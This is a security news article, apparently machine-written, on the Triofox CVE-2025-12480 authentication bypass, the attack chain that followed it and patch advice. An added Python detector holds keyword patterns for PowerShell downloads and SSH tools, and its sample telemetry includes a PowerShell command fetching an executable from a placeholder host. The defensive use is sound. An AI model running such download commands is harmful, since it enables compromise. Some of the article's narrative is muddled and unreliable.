

Ethical Hacking News

A Sudden and Sneaky Vulnerability: How Triofox's Unauthenticated Access Bug Allowed Attackers to Gain Control


Researchers exposed a vulnerability in Gladinet's Triofox file-sharing platform that allowed attackers to bypass authentication and execute malicious payloads. A patch was released in version 16.7.10368.56560, but experts warn of the need for regular security audits and updates to prevent similar attacks.

  • Researchers discovered an unauthenticated access vulnerability in Gladinet's Triofox file-sharing and remote access platform (CVE-2025-12480).
  • The vulnerability allowed attackers to bypass authentication, access configuration pages, and execute arbitrary payloads.
  • An attacker could exploit this vulnerability by chaining it with the abuse of the built-in anti-virus feature to achieve code execution.
  • Security measures were overlooked by system administrators, leading to a successful attack.
  • The attackers used tools such as the Plink or PuTTY utility and PowerShell commands to execute malicious payloads and deploy additional malware.
  • The vulnerability was patched in Triofox version 16.7.10368.56560, but security teams should still audit admin accounts and verify anti-virus configuration.


    Researchers at Mandiant Threat Defense recently exposed an unauthenticated access vulnerability in Gladinet's Triofox file-sharing and remote access platform. This n-day vulnerability, assigned CVE-2025-12480, allowed attackers to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads. The attack was successful because of a series of errors on the part of the system administrators, who failed to enforce proper security measures.

    The Triofox platform is a legitimate tool for remote access and file sharing, but it seems that its creators overlooked basic security principles. An attacker could exploit this vulnerability by chaining it with abuse of the built-in anti-virus feature to achieve code execution. The attack chain began with a Host header attack, which let the attacker bypass normal authentication checks.

    To take full advantage of this vulnerability, attackers would need to use their own tools and exploits, such as the Plink or PuTTY utility. An attacker could then log in using the newly created admin account, upload malicious files, and execute them with the built-in anti-virus feature. The malicious batch script was configured by uploading an arbitrary file to any published share within the Triofox instance.

    The attackers then used a PowerShell command to download and execute a second-stage payload. This payload was disguised as a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer, which allowed it to deploy the Zoho Assist and AnyDesk remote access utilities on the host.

    Furthermore, the attackers were able to use Zoho Assist to run commands that enumerated active SMB sessions and local and domain user information. They also attempted to change passwords for existing accounts and add new accounts to the local administrators and Domain Admins groups.

    The vulnerability was patched in Triofox version 16.7.10368.56560. However, researchers warn that security teams should audit admin accounts and verify that Triofox's Anti-virus Engine is not configured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using the hunting queries listed at the bottom of the Mandiant post, and monitor for anomalous outbound SSH traffic.
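
The monitoring advice above, as an added example (not code from Mandiant or from this article): it flags Plink/PuTTY execution, PowerShell download commands, and outbound SSH to unapproved external hosts. The event field names, host name, paths, and addresses are constructed assumptions, not a real log schema.

```python
import ipaddress
import json
import ntpath
import re

# Assumptions: internal ranges and the approved external SSH host are site-specific.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
APPROVED_SSH_DESTS = {"198.51.100.7"}  # constructed: e.g. an off-site backup target
SSH_CLIENTS = {"plink.exe", "putty.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I)

# Constructed sample telemetry; field names are hypothetical.
SAMPLE_EVENTS = r"""
{"type": "process", "host": "fs01", "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"}
{"type": "process", "host": "fs01", "image": "C:\\Windows\\Temp\\plink.exe", "cmdline": "plink.exe"}
{"type": "process", "host": "fs01", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -c Get-Service"}
{"type": "process", "host": "fs01", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -c Invoke-WebRequest http://example.invalid/x -OutFile x.exe"}
{"type": "network", "host": "fs01", "dest_ip": "10.0.0.8", "dest_port": 22}
{"type": "network", "host": "fs01", "dest_ip": "198.51.100.7", "dest_port": 22}
{"type": "network", "host": "fs01", "dest_ip": "203.0.113.25", "dest_port": 22}
{"type": "network", "host": "fs01", "dest_ip": "203.0.113.25", "dest_port": 443}
""".strip()

def is_internal(ip):
    """True if ip falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def triage(lines):
    """Return (host, reason) findings for JSON-lines events from a file server."""
    findings = []
    for line in lines.splitlines():
        ev = json.loads(line)
        if ev["type"] == "process":
            exe = ntpath.basename(ev["image"]).lower()
            # Name matching misses renamed binaries; the network rule is the backstop.
            if exe in SSH_CLIENTS:
                findings.append((ev["host"], "ssh-client-executed"))
            elif exe in PS_HOSTS and PS_DOWNLOAD.search(ev["cmdline"]):
                findings.append((ev["host"], "powershell-download"))
        elif ev["type"] == "network" and ev["dest_port"] == 22:
            external = not is_internal(ev["dest_ip"])
            if external and ev["dest_ip"] not in APPROVED_SSH_DESTS:
                findings.append((ev["host"], "outbound-ssh"))
    return findings

if __name__ == "__main__":
    for host, reason in triage(SAMPLE_EVENTS):
        print(host, reason)
```
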

    The case highlights the importance of regular security audits and updates in protecting against such vulnerabilities. It also serves as a reminder that even legitimate tools can be exploited if not used with proper security measures in place.

    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Sudden-and-Sneaky-Vulnerability-How-Triofoxs-Unauthenticated-Access-Bug-Allowed-Attackers-to-Gain-Control-ehn.shtml

  • https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480/


  • Published: Mon Nov 10 10:39:53 2025 by llama3.2 3B Q4_K_M












